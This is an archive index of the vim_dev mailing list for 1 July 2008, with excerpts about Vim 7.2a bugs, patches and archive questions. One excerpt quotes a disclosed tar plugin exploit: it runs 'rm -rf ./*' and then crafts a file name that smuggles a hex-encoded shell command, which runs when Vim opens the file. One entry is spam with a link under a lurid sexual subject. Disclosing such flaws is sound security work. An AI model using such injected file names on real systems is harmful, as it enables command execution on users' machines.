VIM 7.2a.10 (GTK2, cygwin) weird cursor color problem

2008-07-01 Fir de Conversatie SungHyun Nam
Hello, I noticed the Cursor and CursorIM color is not displayed correctly in VIM 7.2a. VIM 7.1.xxx (Last xxx was 330) worked as expected. For the VIM 7.2a; 1. run gvim - 'Cursor' color 2. type 'i' - 'Cursor' color 3. type imak (s-space) - 'CursorIM' color I can

Re: where can I find tar.gz of all vim-dev messages ?

2008-07-01 Fir de Conversatie Richard Hartmann
On Mon, Jun 30, 2008 at 23:17, Christian MICHON [EMAIL PROTECTED] wrote: web based format, close to useless unless I write a clever awk script after I individually download each page individually. wget comes to mind. I am sure you will find a script to do what you want. Wanting web archives

nude videos of gopika

2008-07-01 Fir de Conversatie nari
## http:\\lakshmiraiprofile.blogspot.com ## --~--~-~--~~~---~--~~ You received this message from the vim_dev maillist. For more information, visit http://www.vim.org/maillist.php

Re: where can I find tar.gz of all vim-dev messages ?

2008-07-01 Fir de Conversatie Christian MICHON
On Tue, Jul 1, 2008 at 12:21 PM, Richard Hartmann [EMAIL PROTECTED] wrote: wget comes to mind. I am sure you will find a script to do what you want. Wanting web archives in a sane format is not too uncommon, after all. thanks for suggesting it. as I mentioned, it would have been the last

Re: Patch 7.2a.001

2008-07-01 Fir de Conversatie Christian MICHON
On Mon, Jun 30, 2008 at 11:39 PM, James Vega [EMAIL PROTECTED] wrote: One feedback: we should try to keep the patch numbers from Bram in the shortlog, shouldn't we ? *shrug* I went back and forth on that and ended up leaving it as is since that's the way I started. I managed to find a neat

Lua compiler file

2008-07-01 Fir de Conversatie Piotr Husiatyński
I've wrote compiler file for Lua: http://wit.edu.pl/~husiatyn/lua.vim --~--~-~--~~~---~--~~ You received this message from the vim_dev maillist. For more information, visit http://www.vim.org/maillist.php -~--~~~~--~~--~--~---

7.2a: No color in xterm?

2008-07-01 Fir de Conversatie Corinna Vinschen
Hi, When running 7.2a in an xterm under Cygwin, the color capabilities of the xterm are not used. Rather, vim uses only standard terminal capabilities like underline, bold, etc. This doesn't happen with vim 7.1. Running vim 7.1 in an xterm under Cygwin shows all colors the xterm is capable

Re: 7.2a: No color in xterm?

2008-07-01 Fir de Conversatie Jürgen Krämer
Hi, Corinna Vinschen wrote: Hi, When running 7.2a in an xterm under Cygwin, the color capabilities of the xterm are not used. Rather, vim uses only standard terminal capabilities like underline, bold, etc. This doesn't happen with vim 7.1. Running vim 7.1 in an xterm under Cygwin

Re: 7.2a: No color in xterm?

2008-07-01 Fir de Conversatie Jürgen Krämer
Hi, Jürgen Krämer wrote: Corinna Vinschen wrote: Hi, When running 7.2a in an xterm under Cygwin, the color capabilities of the xterm are not used. Rather, vim uses only standard terminal capabilities like underline, bold, etc. This doesn't happen with vim 7.1. Running vim 7.1 in an

Re: 7.2a: No color in xterm?

2008-07-01 Fir de Conversatie Corinna Vinschen
On Jul 1 16:37, Marc Haisenko wrote: On Tuesday 01 July 2008, Corinna Vinschen wrote: Hi, When running 7.2a in an xterm under Cygwin, the color capabilities of the xterm are not used. Rather, vim uses only standard terminal capabilities like underline, bold, etc. This doesn't

Re: 7.2a: No color in xterm?

2008-07-01 Fir de Conversatie Marc Haisenko
On Tuesday 01 July 2008, Corinna Vinschen wrote: xterm has color capabilities for ages and the terminfo xterm entry contains this information. Yes, but in a lot of places it is still assumed that xterm means monochrome. For example, try OpenSolaris: if TERM=xterm you'll get a monochrome vim.

Re: 7.2a: No color in xterm?

2008-07-01 Fir de Conversatie Gary Johnson
On 2008-07-01, Marc Haisenko [EMAIL PROTECTED] wrote: On Tuesday 01 July 2008, Corinna Vinschen wrote: xterm has color capabilities for ages and the terminfo xterm entry contains this information. Yes, but in a lot of places it is still assumed that xterm means monochrome. For

Re: In Windows, :ruby command is not works around socket

2008-07-01 Fir de Conversatie Bram Moolenaar
I found a ruby command's bug on Windows VIM. :ruby require 'open-uri' :ruby open('http://google.com/') = SocketError: `initialize': getaddrinfo: non-recoverable failure in name resolution. :ruby open('http://66.249.89.147') = vim dies In Windows, NtInitialize() should called when

Re: BUG: BufReadPre autocmd changes cursor position on :pedit

2008-07-01 Fir de Conversatie Bram Moolenaar
Ingo Karkat wrote: Hello VIM developers, I found a small bug in :pedit when one wants to clone the current buffer to the preview window _and_ there is a :autocmd for the 'BufReadPre' event; in that case, the cursor jumps to the first line of the original window instead of remaining at

Re: VIM 7.2a.10 (GTK2, cygwin) weird cursor color problem

2008-07-01 Fir de Conversatie Bram Moolenaar
SungHyun Nam wrote: I noticed the Cursor and CursorIM color is not displayed correctly in VIM 7.2a. VIM 7.1.xxx (Last xxx was 330) worked as expected. For the VIM 7.2a; 1. run gvim - 'Cursor' color 2. type 'i' - 'Cursor' color 3. type imak (s-space) - 'CursorIM' color

Re: [patch] fixed 3 bugs with invalid utf-8 sequences

2008-07-01 Fir de Conversatie Bram Moolenaar
Dominique Pelle wrote: Attached patch fixes incorrect cell computation introduced my previous patch fix2-invalid-utf8-seq.patch while still correcting the original bug (read overflow). I tested it, but please review it. I'm not too pleased about the hard-coded 4 cells for illegal

Re: where can I find tar.gz of all vim-dev messages ?

2008-07-01 Fir de Conversatie Bram Moolenaar
Christian Michon wrote: On Mon, Jun 30, 2008 at 11:13 PM, Tony Mechelynck [EMAIL PROTECTED] wrote: See http://vim.sourceforge.net/maillist.php#vim-dev under Archive. I don't know under what format the archives are held. web based format, close to useless unless I write a clever awk

Patch 7.2a.011

2008-07-01 Fir de Conversatie Bram Moolenaar
Patch 7.2a.011 Problem:The Edit/Startup Settings menu doesn't work. Solution: Expand environment variables. (Ben Schmidt) Files: runtime/menu.vim *** ../vim-7.2a.010/runtime/menu.vimWed Jun 25 21:51:59 2008 --- runtime/menu.vimMon Jun 30 22:54:27 2008 *** *** 2,8

Re: BUG: BufReadPre autocmd changes cursor position on :pedit

2008-07-01 Fir de Conversatie Ingo Karkat
On 01-Jul-08 21:34, Bram Moolenaar wrote: Ingo Karkat wrote: Hello VIM developers, I found a small bug in :pedit when one wants to clone the current buffer to the preview window _and_ there is a :autocmd for the 'BufReadPre' event; in that case, the cursor jumps to the first line of

Re: VIM 7.2a.10 (GTK2, cygwin) weird cursor color problem

2008-07-01 Fir de Conversatie SungHyun Nam
Bram Moolenaar wrote: SungHyun Nam wrote: I noticed the Cursor and CursorIM color is not displayed correctly in VIM 7.2a. VIM 7.1.xxx (Last xxx was 330) worked as expected. For the VIM 7.2a; 1. run gvim - 'Cursor' color 2. type 'i' - 'Cursor' color 3. type imak (s-space) -

Re: Fwd: Re: Collection of Vulnerabilities in Fully Patched Vim 7.1

2008-07-01 Fir de Conversatie Tony Mechelynck
On 02/07/08 02:26, Jan Minář wrote: Looks like this didn't go through, so here it is again: [...] The updated tarplugin attack is rather simple: $ rm -rf ./* $ touch foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar $ vim +:q ./foo* $ ls

Re: VIM 7.2a.10 (GTK2, cygwin) weird cursor color problem

2008-07-01 Fir de Conversatie mattn
SungHyun Nam, more question. what $LANG? what $GTK_IM_MODULE? what $XMODIFIERS Thanks. On Wed, Jul 2, 2008 at 10:28 AM, SungHyun Nam [EMAIL PROTECTED] wrote: mattn wrote: Hmm, it seems that current code was broken for japanese also. I'll look into it later. SungHyun Nam, What IM do you

Re: VIM 7.2a.10 (GTK2, cygwin) weird cursor color problem

2008-07-01 Fir de Conversatie SungHyun Nam
Hello, My settings are: --- $ echo $LANG $ echo $GTK_IM_MODULE hangul2 $ echo $XMODIFIERS $ I think LANG does not affect cygwin. Instead windows's current codepage(?) affects cygwin. I use Korean version of windows which use CP949 codepage. Unix(or Linux)

Error in vimrc_example.vim when no mouse support

2008-07-01 Fir de Conversatie Tony Mechelynck
Hi Bram, I just compiled a minimal Vim as an experiment. Here are my configure settings (most of them are probably redundant): export CONF_OPT_X='--without-x' export CONF_OPT_GUI='--disable-gui' export CONF_OPT_FEAT='--with-features=tiny' export CONF_OPT_PERL='--disable-perlinterp' export

Re: VIM 7.2a.10 (GTK2, cygwin) weird cursor color problem

2008-07-01 Fir de Conversatie Tony Mechelynck
On 02/07/08 06:23, SungHyun Nam wrote: Hello, My settings are: --- $ echo $LANG $ echo $GTK_IM_MODULE hangul2 $ echo $XMODIFIERS $ I think LANG does not affect cygwin. Instead windows's current codepage(?) affects cygwin. I use Korean version of